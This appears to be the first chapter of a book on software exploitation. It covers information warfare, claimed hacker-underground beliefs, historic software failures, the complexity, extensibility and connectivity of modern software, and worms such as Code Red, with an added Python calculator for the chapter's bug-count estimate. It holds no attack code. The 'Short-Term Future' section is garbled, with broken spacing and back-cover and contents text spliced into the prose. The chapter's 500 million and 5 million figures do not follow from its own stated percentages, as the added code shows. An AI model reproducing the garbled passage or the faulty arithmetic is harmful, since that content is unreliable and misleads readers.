An effective spy has always been someone who can gather and perhaps even control vast amounts of sensitive information. In this age of highly interconnected computation, this is especially true. If sensitive information can be obtained over networks, a spy need not be physically exposed. Less exposure means less chance of being caught or otherwise compromised. It also means that an intelligence-gathering capability costs far less than has traditionally been the case.

Because war is intimately tied to the economy, electronic warfare is in many cases concerned with the electronic representation of money. For the most part, modern money is a cloud of electrons that happens to be in the right place at the right time. Trillions of electronic dollars flow in to and out of nations every day. Controlling the global networks means controlling the global economy. This turns out to be a major goal of IW.

Digital Tradecraft

Some aspects of IW are best thought of as digital tradecraft.

Main entry: trade·craft
Pronunciation: 'trād-"kraft
Function: noun
Date: 1961
: the techniques and procedures of espionage. . . (Webster's, page 1250)

Modern espionage is carried out using software. In an information system-driven attack, an existing software weakness is exploited to gain access to information, or a backdoor is inserted into the software before it's deployed.[5] Existing software weaknesses range from configuration problems to programming bugs and design flaws. In some cases the attacker can simply request information from target software and get results. In other cases subversive code must be introduced into the system. Some people have tried to classify subversive code into categories such as logic bomb, spyware, Trojan horse, and so forth. The fact is that subversive code can perform almost any nefarious activity. Thus, any attempt at categorization most often is a wasted exercise if you are concerned only with results. In some cases, broad classification helps users and analysts differentiate attacks, which may aid in understanding. At the highest level, subversive code performs any combination of the following activities:

[5] See Ken Thompson's famous paper on trusting trust [1984].

1. Data collection
   a. Packet sniffing
   b. Keystroke monitoring
   c. Database siphoning
2. Stealth
   a. Hiding data (stashing log files and so on)
   b. Hiding processes
   c. Hiding users of a system
   d. Hiding a digital "dead drop"
3. Covert communication
   a. Allowing remote access without detection
   b. Transferring sensitive data out of the system
   c. Covert channels and steganography
4. Command and control
   a. Allowing remote control of a software system
   b. Sabotage (variation of command and control)
   c. Denying system control (denial of service)

For the most part, this book focuses on the technical details of exploiting software in order to construct and introduce subversive code. The skills and techniques introduced in this book are not new and have been used by a small but growing community of people for almost 20 years. Many techniques were developed independently by small, disparate groups. Only recently have software exploit techniques been combined into a single art. The coming together of disparate approaches is largely a historical accident. Many of the techniques for reverse engineering were developed as an offshoot of the software-cracking movement that started in Europe.
Techniques for writing subversive code are similar to techniques for cracking software protection (such as patching), so naturally the virus movement shares similar roots and core ideas. It was not uncommon in the 1980s to find virus code and software cracks on the same bulletin board systems (BBSs). Hacking network security, on the other hand, evolved out of the community of UNIX administrators. Many people familiar with classic network hacking think mostly of stealing passwords and building software trapdoors, for the most part ignoring subversive code. In the early 1990s, the two disciplines started to merge and the first remote shell exploits began to be distributed over the Internet.

Today, there are many books on computer security, but none of them explain the offensive aspect from a technical programming perspective.[6] All of the books on hacking, including the popular book Hacking Exposed by McClure et al. [1999], are compendiums of hacker tricks and existing exploits focused on network security issues. They do nothing to train the practitioner to find new software exploits. This is too bad, mostly because the people charged with writing secure systems have little idea what they are really up against. If we continue to defend only against the poorly armed script kiddie, our defenses are not likely to hold up well against the more sophisticated attacks happening in the wild today.

[6] The time is ripe for books like this one, so we're likely to see the emergence of a software exploit discipline during the next few years.

Why write a book full of dangerous stuff?! Basically, we're attempting to dispel pervasive misconceptions about the capabilities of software exploits. Many people don't realize how dangerous a software attacker can be. Nor do they realize that few of the classic network security technologies available today do much to stop them. Perhaps this is because software seems like magic to most people, or perhaps it's the misinformation and mismarketing perpetuated by unscrupulous (or possibly only clueless) security vendors. Claims commonly made in the security underground serve as an important wake-up call that we can no longer afford to ignore.

How Some Software Hackers Think

"Give a man a crack, and he'll be hungry again tomorrow, teach him how to crack, and he'll never be hungry again."

—+ORC

What do people that break software maliciously believe? How do they approach the problem of exploiting software? What have they accomplished? Answers to questions like these are important if we are to properly approach the problem of building secure systems correctly.

In some sense, a knowledgeable software hacker is one of the most powerful people in the world today. Insiders often repeat a litany of surprising facts about software attacks and their results. Whether all these facts are true is an interesting question. Many of these claims do appear to have some basis in reality, and even if they are exaggerated, they certainly provide some insight into the malicious hacker mind-set.

Insiders claim that

• Most of the global 2000 companies are currently infiltrated by hackers. Every major financial institution not only has broken security, but hackers are actively exploiting them.

• Most outsourced software (software developed off-site by contractors) is full of backdoors and is extremely difficult to audit independently. Companies that commission this kind of software have not traditionally paid any attention to security at all.

• Every developed nation on earth is spending money on cyberwarfare capabilities. Both defensive and offensive cyberwarfare capabilities exist.

• Firewalls, virus scanners, and intrusion detection systems don't work very well at all. Computer security vendors have overpromised and underdelivered with classic network security approaches. Not enough attention has been paid to software security issues.

Insiders make use of a set of standard-issue questions to determine whether a person is "in the know." Here are some of the claims commonly cited in this activity. A person "in the know" usually believes the following about software exploits:

• Software copy protection (digital rights management) has never worked and it never will. It's not even possible in theory.

• Having executable software in binary form is just as good, if not better, than having source code. There are no software trade secrets. Security through obscurity only helps potential attackers, especially if obscurity is used to hide poor design.

• There are hundreds of undisclosed exploits in use right now (known as 0day's) and they will very likely remain undisclosed for years to come. Nobody should depend on software patches and "full disclosure" mailing lists for security. Such sources tend to lag significantly behind the underground when it comes to software exploit.

• A majority of machines attached to the Internet (with very few exceptions) can be remotely exploited right now, including those running the most up-to-date, fully patched versions of Microsoft Windows, Linux, BSD, and Solaris. Highly popular third-party applications including those from Oracle, IBM, SAP, PeopleSoft, Tivoli, and HP are also susceptible to exploit right now as well.

• Many "hardware" devices attached to the Internet (with few exceptions) can be remotely exploited right now—including 3COM switches, the Cisco router and its IOS software, the Checkpoint firewall, and the F5 load balancer.

• Most critical infrastructure that controls water, gas and oil, and electrical power can be exploited and controlled remotely using weaknesses in SCADA software right now.

• If a malicious hacker wants into your particular machine, they will succeed. Reinstalling your operating system or uploading a new system image after the compromise will not help since skilled hackers can infect the firmware of your system microchips.

• Satellites have been exploited and will continue to be exploited.

According to insiders in the underground, all of these things are happening now. But even if some of these claims stretch the truth, it is high time for us to get our collective head out of the sand and acknowledge what's going on. Pretending the information in this book does not exist and that the results are not critical is simply silly.

Bad Software Is Ubiquitous

Software security is typically thought of solely as an Internet problem, but this is far from the truth. Although business has evolved to use the Internet, many software systems are isolated on special proprietary networks or are confined to individual machines. Software is clearly responsible for much more than writing e-mail, doing spreadsheets, and playing on-line games. When software fails, millions of dollars are lost and sometimes people are killed. What follows in this section are some well-known examples of software failures.

The reason that this kind of information is relevant to exploiting software is that software failure that happens "spontaneously" (that is, without intentional mischief on the part of an attacker) demonstrates what can happen even without factoring in malicious intent. Put in slightly different terms, consider that the difference between software safety and software security is the addition of an intelligent adversary bent on making your system break. Given these examples, imagine what a knowledgeable attacker could do!

NASA Mars Lander

One simple software failure cost US taxpayers about $165 million when the NASA Mars Lander crashed into the surface of Mars. The problem was a basic computational translation between English and metric units of measure. As a result of the bug, a major error in the spacecraft's trajectory cropped up as it approached Mars. The lander shut off its descent engines prematurely, resulting in a crash.

Denver Airport Baggage

The modern Denver International Airport has an automated baggage system that uses unmanned carts running along a fixed track—all controlled by software. When it was first brought on-line for testing, carts could not properly detect or recover from failures. This was because of numerous software problems. The carts would get out of sync, empty carts would be "unloaded" of nothing, and full carts would be "loaded" far beyond capacity. Piles of fallen bags would not even stop the loaders. These software bugs delayed the opening of the airport for 11 months, costing the airport at least $1 million a day.

MV-22 Osprey

The MV-22 Osprey (Figure 1-2) is an advanced military aircraft that is a special fusion between a vertical liftoff helicopter and a normal airplane. The aircraft and its aerodynamics are extremely complex, so much so that the plane must be controlled by a variety of sophisticated control software. This aircraft, like most, includes several redundant systems in case of failure. During one doomed takeoff, a faulty hydraulic line burst. This was a serious problem, but one that can usually be recovered from. However, in this case, a software failure caused the backup system not to engage properly. The aircraft crashed and four marines were killed.

Figure 1-2. The MV-22 Osprey in flight. Sophisticated control software has life-critical impact. Official U.S. Navy photo by Photographer's Mate 1st Class Peter Cline.

The US Vincennes

In 1988, a US Navy ship launched a missile and shot down a hostile threat identified by the onboard radar and tracking system as an enemy fighter aircraft (Figure 1-3). In reality, the "threat" was a commercial flight filled with unsuspecting travelers on an Airbus A320 (Figure 1-4). Two hundred ninety people lost their lives when the plane was shot down. The official excuse from the US Navy blamed cryptic and misleading output displayed by the tracking software.

Figure 1-3. Fighter aircraft of the type identified by the US Vincennes tracking software, and subsequently deemed hostile. NASA/Dryden Flight Research Center.

Figure 1-4. An Airbus A320, misidentified as a fighter jet by the US Vincennes tracking software and subsequently shot down, killing 290 innocent people. © Airbus, 2003. All rights reserved.

Microsoft and the Love Bug

The love bug, also known as the "ILOVEYOU" virus, was made possible because the Microsoft Outlook e-mail client was (badly) designed to execute programs that were mailed from possibly untrusted sources. Apparently, nobody on the software team at Microsoft thought through what a virus could do using the built-in scripting features. The damage resulting from the "ILOVEYOU" virus was reported to be in the billions of dollars.[7] Note that this loss was paid for by the Microsoft customers who use Outlook, and not by Microsoft itself. The love bug provides an important example of how an Internet virus can cause very large financial damage to the business community.

[7] Sources claim this bug cost the economy billions of dollars (mostly as a result of lost productivity). For more information, see http://news.com.com/2100-1001-240112.html?legacy=cnet.

As this book goes to press, yet another large-scale worm called Blaster (and a number of copycats) has swept the planet, causing billions of dollars in damage. Like the love bug, the Blaster worm was made possible by vulnerable software.

Looking at all these cases together, the data are excruciatingly clear: Software defects are the single most critical weakness in computer systems. Clearly, software defects cause catastrophic failures and result in huge monetary losses. Similarly, software defects allow attackers to cause damage intentionally and to steal valuable information. In the final analysis, software defects lead directly to software exploit.

The Trinity of Trouble

Why is making software behave so hard? Three factors work together to make software risk management a major challenge today. We call these factors the trinity of trouble. They are

1. Complexity

2. Extensibility

3. Connectivity

Complexity

Modern software is complicated, and trends suggest that it will become even more complicated in the near future. For example, in 1983 Microsoft Word had only 27,000 lines of code (LOC) but, according to Nathan Myhrvold,[8] by 1995 it was up to 2 million! Software engineers have spent years trying to figure out how to measure software. Entire books devoted to software metrics exist. Our favorite one, by Zuse [1991], weighs in at more than 800 pages. Yet only one metric seems to correlate well with a number of flaws: LOC. In fact, LOC has become known in some hard-core software engineering circles as the only reasonable metric.

[8] Wired Magazine ran a story on this issue that is available at http://www.wired.com/wired/archive/3.09/myhrvold.html?person=gordon_moore&topic_set=wiredpeople.

The number of bugs per thousand lines of code (KLOC) varies from system to system. Estimates are anywhere between 5 to 50 bugs per KLOC. Even a system that has undergone rigorous quality assurance (QA) testing will still contain bugs—around five bugs per KLOC. A software system that is only feature tested, like most commercial software, will have many more bugs—around 50 per KLOC [Voas and McGraw, 1999]. Most software products fall into the latter category. Many software vendors mistakenly believe they perform rigorous QA testing when in fact their methods are very superficial. A rigorous QA methodology goes well beyond unit testing and includes fault injection and failure analysis.

To give you an idea of how much software lives within complex machinery, consider the following:

Lines of Code    System
400,000          Solaris 7
17 million       Netscape
40 million       Space Station
10 million       Space Shuttle
7 million        Boeing 777
35 million       NT5
1.5 million      Linux
<5 million       Windows 95
40 million       Windows XP

As we mention earlier, systems like these tend to have bug rates that vary between 5 and 50 bugs per KLOC. One demonstration of the increase in complexity over the years is to consider the number of LOC in various Microsoft operating systems. Figure 1-5 shows how the Microsoft Windows operating system has grown since its inception in 1990 as Windows 3.1 (3 million LOC) to its current form as Windows XP in 2002 (40 million LOC). One simple but unfortunate fact holds true for software: more lines, more bugs. If this fact continues to hold, XP is certainly not destined to be bug free![9] The obvious question to consider given our purposes is: How many such problems will result in security issues? And how are bugs and other weaknesses turned into exploits?

[9] Nor has it turned out to be, with serious vulnerabilities discovered within months of its release.

Figure 1-5. Windows complexity as measured by LOC. Increased complexity leads to more bugs and flaws.

A desktop system running Windows XP and associated applications depends on the proper functioning of the kernel as well as the applications to ensure that an attacker cannot corrupt the system. However, XP itself consists of approximately 40 million LOC, and applications are becoming equally (if not more) complex. When systems become this large, bugs cannot be avoided.

Exacerbating this problem is the widespread use of low-level programming languages such as C or C++ that do not protect against simple kinds of attacks such as buffer overflows (which we discuss in this book). In addition to providing more avenues for attack through bugs and other design flaws, complex systems make it easier to hide or mask malicious code. In theory, we could analyze and prove that a small program is free of security problems, but this task is impossible for even the simplest desktop systems today, much less the enterprise-wide systems used by businesses or governments.

More Lines, More Bugs

Consider a 30,000-node network, the kind that a medium-size corporation would probably have. Each workstation on the network contains software in the form of executables (EXE) and libraries, and has, on average, about 3,000 executable modules. On average, each module is about 100K bytes in size. Assuming that a single LOC results in about 10 bytes of code, then at a very conservative rate of five bugs per KLOC, each executable module will have about 50 bugs:

Now factor in the fact that each host has about 3,000 executables. This means that each machine in the network has about 150,000 unique bugs:

That's plenty of bugs to be sure, but the real trouble occurs when we consider possible targets and the number of copies of such bugs that exist as targets for attack. Because these same 150,000 bugs are copied many times over 30,000 hosts, the number of bug instantiations that an attacker can target is huge. A 30,000-machine network has about 4.5 billion bug instantiations to target (according to our estimate, only 150,000 of these bugs are unique, but that's not the point):

If we posit that 10% of all the bugs result in a security failure of some kind, and further conjecture that only 10% of those bugs can be exercised remotely (over the network), then according to our estimates, our toy network has 5 million remote software vulnerabilities to attack. Resolving 150,000 bugs is a serious challenge, and properly managing the patches for 5 million bug instantiations spread over 30,000 hosts is even worse:

4.5 billion x 10% = 500 million security bug instantiations

500 million x 10% = 5 million remotely exploitable security bug targets

Clearly the attacker is on the winning side of these numbers. It is no surprise, given the homogeneity of operating systems and applications (leading to these skewed numbers), that worms like the Blaster worm of 2003 are so successful at propagating.[10]

[10] Some security researchers conjecture that diversity might help address the problem, but experiments show that getting this idea to work in practice is more difficult than it appears at first blush.
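The chain of estimates above, together with the 5-to-50 bugs per KLOC range from the Complexity section, as a small calculator. This is an added example, not code from the book: the class and function names are my own, and the default values are the chapter's stated assumptions.

```python
"""Bug-exposure model behind the "More Lines, More Bugs" estimate.

Added example, not code from the book: it encodes the chain of assumptions
the chapter walks through (module size, bytes per LOC, bugs per KLOC,
modules per host, hosts, and the two 10% cuts) so the figures can be
re-derived and the assumptions varied. Integer arithmetic keeps every
intermediate product exact.
"""
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Assumptions:
    """Inputs to the estimate; defaults are the chapter's stated figures."""
    hosts: int = 30_000            # nodes in a medium-size corporate network
    modules_per_host: int = 3_000  # executables and libraries per workstation
    module_bytes: int = 100_000    # average size of one module (about 100K)
    bytes_per_loc: int = 10        # compiled bytes produced per source line
    bugs_per_kloc: int = 5         # 5 after rigorous QA, ~50 if feature tested only
    security_pct: int = 10         # share of bugs that are security failures
    remote_pct: int = 10           # share of those exercisable over the network


@dataclass(frozen=True)
class Exposure:
    """Each stage of the estimate, in the order the chapter presents them."""
    kloc_per_module: int
    bugs_per_module: int
    unique_bugs_per_host: int
    bug_instantiations: int        # copies of the same bugs across every host
    security_instantiations: int
    remote_targets: int


def estimate(a: Assumptions = Assumptions()) -> Exposure:
    """Carry the chapter's estimate through without rounding.

    Integer division truncates, which is acceptable for an order-of-magnitude
    model and exact for the default figures.
    """
    kloc = a.module_bytes // a.bytes_per_loc // 1_000    # 100K bytes -> 10 KLOC
    per_module = kloc * a.bugs_per_kloc                  # 10 KLOC * 5 -> 50 bugs
    per_host = per_module * a.modules_per_host           # * 3,000 modules -> 150,000
    instantiations = per_host * a.hosts                  # * 30,000 hosts -> 4.5 billion
    security = instantiations * a.security_pct // 100    # 10% -> 450 million
    remote = security * a.remote_pct // 100              # 10% -> 45 million
    return Exposure(kloc, per_module, per_host, instantiations, security, remote)


def qa_sensitivity(a: Assumptions = Assumptions()) -> dict:
    """Remote target count at both ends of the chapter's 5-50 bugs/KLOC range.

    Every downstream figure scales linearly with the bug rate, so the gap
    between rigorous QA and feature-only testing is a factor of ten.
    """
    lo = estimate(replace(a, bugs_per_kloc=5)).remote_targets
    hi = estimate(replace(a, bugs_per_kloc=50)).remote_targets
    return {"rigorous_qa": lo, "feature_tested": hi, "ratio": hi // lo}


if __name__ == "__main__":
    e = estimate()
    for stage, value in vars(e).items():
        print(f"{stage:<26}{value:>16,}")
    print("remote targets by QA level:", qa_sensitivity())
```

Carried through unrounded, the last two stages come out at 450 million and 45 million; the text rounds 4.5 billion x 10% up to 500 million, and 10% of either figure is in the tens of millions rather than the 5 million quoted.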

Extensibility

Modern systems built around virtual machines (VMs) that preserve type safety and carry out security access checks—in this way allowing untrusted mobile code to be executed—are extensible systems. Two prime examples are Java and .NET. An extensible host accepts updates or extensions, sometimes referred to as mobile code, so that the system's functionality can be evolved in an incremental fashion. For example, a Java Virtual Machine (JVM) will instantiate a class in a namespace and potentially allow other classes to interact with it. Most modern operating systems (OSs) support extensibility through dynamically loadable device drivers and modules. Today's applications, such as word processors, e-mail clients, spreadsheets, and Web browsers, support extensibility through scripting, controls, components, dynamically loadable libraries, and applets.

But none of this is really new. In fact, if you think about it, software is really an extensibility vector for general-purpose computers. Software programs define the behavior of a computer, and extend it in interesting and novel ways. Unfortunately, the very nature of modern, extensible systems makes security harder. For one thing, it is hard to prevent malicious code from slipping in as an unwanted extension, meaning the features designed to add extensibility to a system (such as Java's class-loading mechanism) must be designed with security in mind. Furthermore, analyzing the security of an extensible system is much harder than analyzing a complete system that can't be changed. How can you take a look at code that has yet to arrive? Better yet, how can you even begin to anticipate every kind of mobile code that may arrive? These and other security issues surrounding mobile code are discussed at length in Securing Java [McGraw and Felten, 1999].

Microsoft has jumped headlong into the mobile code fray with their .NET framework. As Figure 1-6 shows, .NET architecture has much in common with Java. One major difference is a smaller emphasis on multiplatform support. But in any case, extensible systems are clearly here to stay. Soon, the term mobile code will be redundant, because all code will be mobile.

Figure 1-6. The .NET framework architecture. Note the architectural similarity with the Java platform: verification, just-in-time (JIT) compilation, class loading, code signing, and a VM.


Mobile code has a dark side that goes beyond the risks inherent in its design for extensibility. In some sense, viruses and worms are kinds of mobile code. That's why the addition of executable e-mail attachments and VMs that run code embedded on Web sites is a security nightmare. Classic vectors of the past, including the "sneaker net" and the infected executable swapped over modems, have been replaced by e-mail and Web content. Mobile code-based viruses and attack weapons are being used by the modern hacker underground. Attack worms don't simply propagate, they install backdoors, monitor systems, and compromise machines for later use in nefarious purposes.

Viruses became very popular in the early 1990s and were mostly spread through infected executable files shuffled around on disks. A worm is a special kind of virus that spreads over networks and does not rely on file infection. Worms are a very dangerous twist on the classic virus and are especially important given our modern reliance on networks. Worm activity became widespread in the late 1990s, although many dangerous worms were neither well publicized nor well understood. Since the early days, large advances have been made in worm technology. Worms allow an attacker to "carpet bomb" a network in an unbridled exploration that attempts to exploit a given vulnerability as widely as possible. This amplifies the overall effect of an attack and achieves results that could never be obtained by manually hacking one machine at a time. Because of the successes of worm technology in the late 1990s, most if not all global 1000 companies have been infected with backdoors. Rumors abound in the underground regarding the so-called Fortune 500 List—a list of currently working backdoors to the Fortune 500 company networks.

One of the first stealthy, malicious worms to infect the global network and to be widely used as a hacking tool was written by a very secretive group in the hacker underground calling itself ADM, short for Association De Malfaiteurs. The worm, called ADMw0rm,[11] exploits a buffer overflow vulnerability in domain name servers (DNS).[12] Once infected, the victim machine begins scanning for other vulnerable servers. Tens of thousands of machines were infected with this worm, but little mention of the worm ever made the press. Some of ADM's original victims remain infected to this day. Alarmingly, the DNS vulnerability used by this worm only scratched the surface. The worm itself was designed to allow other exploit techniques to be added to its arsenal easily. The worm itself was, in fact, an extensible system. We can only guess at how many versions of this worm are currently in use on the Internet today.

[11] ADMw0rm-v1.tar can be found on various Internet sites and contains the source code to the infamous ADMw0rm that first appeared in spring 1998.

[12] More information on BIND problems can be found at http://www.cert.org/advisories/CA-98.05.bind_problems.html.

In 2001, a famous network worm called Code Red made headlines by infecting hundreds of thousands of servers. Code Red infects Microsoft IIS Web servers by exploiting a very simple and unfortunately pervasive software problem.[13] As is usually the case with a successful and highly publicized attack, several variations of this worm have been seen in the wild. Code Red infects a server and then begins scanning for additional targets. The original version of Code Red has a tendency to scan other machines that are in proximity to the infected network. This limits the speed with which standard Code Red spreads. Promptly after its network debut, an improved version of Code Red was released that fixed this problem and added an optimized scanning algorithm to the mix. This further increased the speed at which Code Red infects systems. The success of the Code Red worm rests on a very simple software flaw that has been widely exploited for more than 20 years. The fact that a large number of Windows-based machines share the flaw certainly helped Code Red spread as quickly as it did. Similar effects have been noted for new worms, including Blaster and Slammer. We will further address the malicious code problem and its relation to exploiting software later in the book. We'll also take a look at hacking tools that exploit software.

[13] Code Red exploits a buffer overflow in the idq.dll, a component of ISAPI.

Connectivity

The growing connectivity of computers through the Internet has increased both the number of attack vectors (avenues for attack) and the ease with which an attack can be made. Connections range from home PCs to systems that control critical infrastructures (such as the power grid). The high degree of connectivity makes it possible for small failures to propagate and cause massive outages. History has proved this with telephone network outages and power system grid failures as discussed on the moderated COMP.RISKS mailing list and in the book Computer-Related Risks [Neumann, 1995].

Because access through a network does not require human intervention, launching automated attacks is relatively easy. Automated attacks change the threat landscape. Consider very early forms of hacking. In 1975, if you wanted to make free phone calls you needed a "blue box." The blue box could be purchased on a college campus, but you needed to find a dealer. Blue boxes also cost money. This meant that only a few people had blue boxes and the threat propagated slowly. Contrast that to today: If a vulnerability is uncovered that allows attackers to steal Pay-Per-View television, the information can be posted on a Web site and a million people can download the exploit in a matter of hours, deeply impacting profits immediately.

New protocols and delivery mediums are under constant development. The upshot of this is more code that hasn't been well tested. New devices are under development that can connect your refrigerator to the manufacturer. Your cellular phone has an embedded OS complete with a file system. Figure 1-7 shows a particularly advanced new phone. Imagine what would happen when a virus infects the cellular phone network.

Figure 1-7. This is a complex mobile phone offered by Nokia. As phones gain functionality such as e-mail and Web browsing, they become more susceptible to software exploit. Courtesy of Nokia.

Highly connected networks are especially vulnerable to service outages in the face of network worms. One paradox of networking is that high connectivity is a classic mechanism for increasing availability and reliability, but path diversity also leads to a direct increase in worm survivability.

Finally, the most important aspect of the global network is economic. Every economy on earth is connected to every other. Billions of dollars flow through this network every second, trillions of dollars every day. The SWIFT network alone, which connects 7,000 international financial companies, moves trillions of dollars every day. Within this interconnected system, huge numbers of software systems are connected to one another and communicate in a massive stream of numbers. Nations and multinational corporations are dependent on this modern information fabric. A glitch in this system could produce instant catastrophe, destabilizing entire economies in seconds. A cascading failure could well bring the entire virtual world to a grinding halt. Arguably, one target of the despicable act of terrorism on September 11, 2001, was to disrupt the world financial system. This is a modern risk that we must face. The public may never know how many software attacks are leveraged against the financial system every day. Banks are very good about keeping this information secret. Given that network-enabled computers have been confiscated from many convicted criminals and known terrorists, it would not be surprising to learn that criminal and terrorist activity includes attacks on financial networks.

The Upshot

Taken together, the trinity of trouble has a deep impact on software security. The three trends of growing system complexity, built-in extensibility, and ubiquitous networking (or connectivity) make the software security problem more urgent than ever. Unfortunately for the good guys, the trinity of trouble has a tendency to make exploiting software much easier!

In March 2003, the Computer Security Institute released its eighth annual survey showing that 56% of the 524 companies and large institutions polled acknowledged suffering financial losses resulting from computer breaches during the previous year. The majority of these breaches were carried out over the Internet. Of the compromised targets, the 251 willing to tally their losses admitted that the hacking cost them roughly $202 million collectively. Even if these numbers are off by a factor of ten, they are still unacceptably high. Although the particular numbers reported in this highly popular survey can be disputed, trends emerging from the annual completion of this survey are an excellent indicator of the growth and importance of the computer security problem.

The Future of Software

The software security problem is likely to get worse before it gets better. The problem is that software itself is changing faster than software security technology. The trinity of trouble has a significant impact on many of the trends outlined in this section.

At the risk of being seriously wrong, we now consult our crystal ball and peer into the future of software. Our mission is to understand where things are going and think about how they will impact software security and the art of exploiting software. Our presentation is organized in three time ranges. (Of course, anyone who purports to predict what is coming is destined to be wrong. So take these musings with a grain of salt.[14])

[14] An acknowledgement is in order. This material was developed with the input of many people, not the least of whom make up Cigital's Technical Advisory Board. Major contributors include Jeff Payne (Cigital), Peter Neumann (SRI), Fred Schneider (Cornell), Ed Felten (Princeton), Vic Basilli (Maryland), and Elaine Weyuker (AT&T). Of course any errors and omissions are our fault.

Short-Term Future: 2003–2004 How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are We b eg in w it h a d iscussion of w h at 's on t h e imm ediat e h orizon as f ar as soft war e g oes. Many fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? of t hese t r ends ar e r eadily app arent as w e w r it e t his b ook. Some hav e been em er gin g f or a What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. few year s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Mor e com p one nt s: Com ponent - b ased soft w ar e is f in ally cat ch in g on . On e r eason for t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om t his is t he need for m or e r obust , reliable, secur e sy st em s. Businesses w it h missionat t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . crit ical code are u sin g sy st em s such as En t erp rise Jav a Beans ( EJB) , CORBA, an d COM ( includin g itbook s .NET inst ant iatyion ) . Comitpon t s twainly r it t eneducat in t hese fr am ewor s w or k t he This m ust - h ave m ay shock ou—and willencer e y ou. Get t ingk bey ond nat u r ally in a d ist r ibu t ed env ir onm en t an d w er e creat ed w it h int er obj ect scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t com mu nicat ion b et w een m u lt ip le ser v er s in m in d. A hand fu l of adv anced d ev elopm en t shops are cr eat ing st andar dized com pon en t s f or special- pu rp ose use ( somet im es creat ing y -ploit cr it ical enttos, be su ch asious a com ponent for p r oper user Why sof t secu w ar eritex w illcom conpon t inue a ser p r oblem aut h en t icat ion ) . 
This can be ex t r em ely helpfu l w hen t ackling t h e pr oblem of bu ild in g Whenitnet w or k secur it y e, m ech anisms do nard ot wcom or kponent s im p lem ent ing r easonab le secur y - crit ical soft war because st and secur it y ar chit ect ur e can b e int egr at ed seam lessly in t o a new d esign. How ev er, t he ar t At tcomp ack pat t ergns of osin com pon en t s int o a coher en t sy st em w h ile maint ain ing em er gent pr oper t ies su ch as secur it y is ex t r em ely d if ficult and poor ly und er st ood, mak ing Rev er se engineer g w ar e subj ect t o ex ploit at ion. com ponent - b asedinsoft Classic t acks ainst servMicr er soft w 'ar Tig ht e ratOS int ag e gr at i on: osoft se int egr at ion of I nt er net Ex plor er int o it s base OS w as no accident . What w as once a clear line b et w een OS and ap plicat ion has becom e Sur pr ising at t acks ag ainst clien t soft war e v er y b lu r ry . Man y act ivit ies t hat once r equir ed special- pur pose app licat ions now com e st andar d in man y OSs, and w hat app ear t o b e st and- alone applicat ions of t en ar e m ere Tech niqu es f or cr aft ing m aliciou s inpu t façad es cr eat ed on t op of m ult iple OS ser v ices. Deep OS int egr at ion lead s t o secu r it y rThe isk b ecauical se itdet r uns t erfert oov t he inciple of com par t m en t alizat ion . When exp loit in g t echn ailscoun of b uf er fpr low s an applicat ion has as a sid e effect of com plet e com pr omise of t h e OS, ex ploit ing a syst Rootem k it st h rou gh soft w ar e becomes m uch easier . gin e nca psu la t ion at ing st ems t enkn d tow o do t oo m u ch , iny any Ex p loBe i t in g nin S o ftgwofa re is f illed wit h t h: eOper t ools, consy cept s, and ledg e necessar t o b case. reak This leads t o secur it y an d r eliabilit y pr oblems. One w ay t o com b at t h e " t oo m u ch st uf f" soft w ar e. 
ph en omenon b rou ght abou t by t ight int egr at ion of applicat ions and OSs is t o encapsulat e lik e fu nct ions t oget her and t h en pr ot ect t h em fr om t h e out side. A g ood exam ple of w h at w e m ean can be foun d in t h e en cap su lat ion of t h e OS by t h e JVM. Th e JVM places m u ch t igh t er con t r ol ov er pr ogr am s t hat it r un s t han a generic OS. This is a boon f or soft w ar e secur it y . Of cour se, adv anced secu rit y mod els b ased on langu agebased en cap su lat ion ar e har d t o get ex act ly r igh t . Man y kn ow n sof t w are ex ploit s h ave been lev eled against t he JVM ( see Secu ring Jav a [ McGr aw an d Felt en , 19 98] ) .

Be gin nin g of w i re le ss: Wireless sy st em adopt ion is begin ning in ear nest . Soon 80 2. 11b an d it s ( hopefu lly im pr ov ed) su ccessor s w ill be w idespr ead. Wir eless net w or kin g h as a lar ge ( negat iv e) imp act on secur it y because it wor k s t o br eak dow n ph ysical bar r ier s ev en m or e. Wit h n o r equir ement f or a w ir e t o con nect m ach ines ph ysically , d et er m in ing w here a secur it y p er im et er is locat ed becom es m uch har der t han it once w as. Soft w ar e exp loit s of w ir eless sy st em s w er e w id ely t ru mp et ed by t he pr ess in 2 001 , and included a com plet e br eak of t he w ir ed equ ivalent pr ivacy ( WEP) encry ptTable ion algor it hm [ 15] an d t he r eem er gence of addr ess resolut ion pr ot ocol ( ARP) • of Content s cach e poisoning at t ack s ( ht t p: / / w w w . cigit al. com / new s/ w ir eless- sec.h t m l ) . 8 02. 11 i is • I ndex being r apidly ad opt ed as t his book goes t o p ress. I t p rom ises a super ior app roach t o Expl oit ing Softw a re How to Br e ak Code secur it y t h an t he m uch- m align ed WEP. By Gr eg Hoglund , Gar y McGr aw [ 15]

The WEP cr ack w as popular ized by Av i Rubin and Adam Stubblefield. For m or e infor mation, see http: / / w w w .ny times.com/ 2001/ 08/ 19/ technology / 19 WI RE.htm l or http: / / w w w .avir ubin.com .

Pub lish er: Addison Wesley

Pub Dat e: February 200ot 4 he r Mor e PDA s ( 17, a nd

